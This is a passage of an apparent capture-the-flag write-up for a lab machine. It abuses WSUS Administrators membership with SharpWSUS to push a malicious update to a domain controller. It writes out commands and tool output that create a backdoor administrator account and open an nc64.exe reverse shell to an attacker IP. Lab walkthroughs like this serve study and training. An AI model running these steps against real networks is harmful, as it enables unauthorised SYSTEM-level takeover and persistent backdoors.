PrivEsc

We can see that we are part of the WSUS Administrators group. This post explain the exploit path.

We need a tool called SharpWSUS. I was able to build it without vscode:

curl -s https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWSUS.ps1 | grep FromBAsE64String | cut -d '"' -f 2 | base64 -d > SharpWSUS.gz
gunzip SharpWSUS.gz
mv SharpWSUS SharpWSUS.exe

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe inspect

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent


####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 10.10.11.175, 10.0.17763.1432, 2/11/2025 9:20:39 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers

[*] Inspect complete

We also need to download psexec.

Once uploaded we can run:

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec.exe" /args:"-accepteula -s -d cmd.exe /c \'net user haxor ezpass /add && net localgroup administrators haxor /add\'" /title:"Haxor-Admin"

Updated:

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec.exe" /args:"-accepteula -s -d C:\\Users\\sflowers\\Documents\\nc64.exe -e cmd.exe 10.10.16.10 1337" /title:"Haxor Admin"

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec.exe" /args:"-accepteula -s -d cmd.exe /c \'net user haxor ezpass /add && net localgroup administrators haxor /add\'" /title:"Haxor-Admin"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: PsExec.exe
[*] Payload Path: C:\Users\sflowers\Documents\PsExec.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \'net user haxor ezpass /add && net localgroup administrators haxor /add\'
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \&amp;#39;net user haxor ezpass /add &amp;amp;&amp;amp; net localgroup administrators haxor /add\&amp;#39;

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:40a15760-adb1-4eb2-8435-8c0752c2a8f6 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:40a15760-adb1-4eb2-8435-8c0752c2a8f6 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:40a15760-adb1-4eb2-8435-8c0752c2a8f6 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

If we check inside the WSUS directory and run the agent it will run psexec, the file we just uploaded

*Evil-WinRM* PS C:\WSUS> dir


    Directory: C:\WSUS


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/15/2022   7:36 AM                UpdateServicesPackages
d-----        2/11/2025   3:30 AM                WsusContent
-a----        2/11/2025   3:35 AM         716176 wuagent.exe


*Evil-WinRM* PS C:\WSUS> .\wuagent.exe

PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com

Next,

.\SharpWSUS.exe approve /updateid:40a15760-adb1-4eb2-8435-8c0752c2a8f6 /computername:dc.outdated.htb /groupname:"Haxor Group"

If we check the inspect now we will see our group here:

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe inspect

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent


####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 10.10.11.175, 10.0.17763.1432, 2/11/2025 11:50:13 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Haxor Group
Unassigned Computers

[*] Inspect complete

After that we need to wait for the client to download the update

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:40a15760-adb1-4eb2-8435-8c0752c2a8f6 /computername:dc.outdated.htb

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is not installed

[*] Check complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:40a15760-adb1-4eb2-8435-8c0752c2a8f6 /computername:dc.outdated.htb

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is installed

[*] Check complete

Once done, we should get a reverse shell back as nt/authority.

PreviousEnumeration NextHospital

Last updated 11 months ago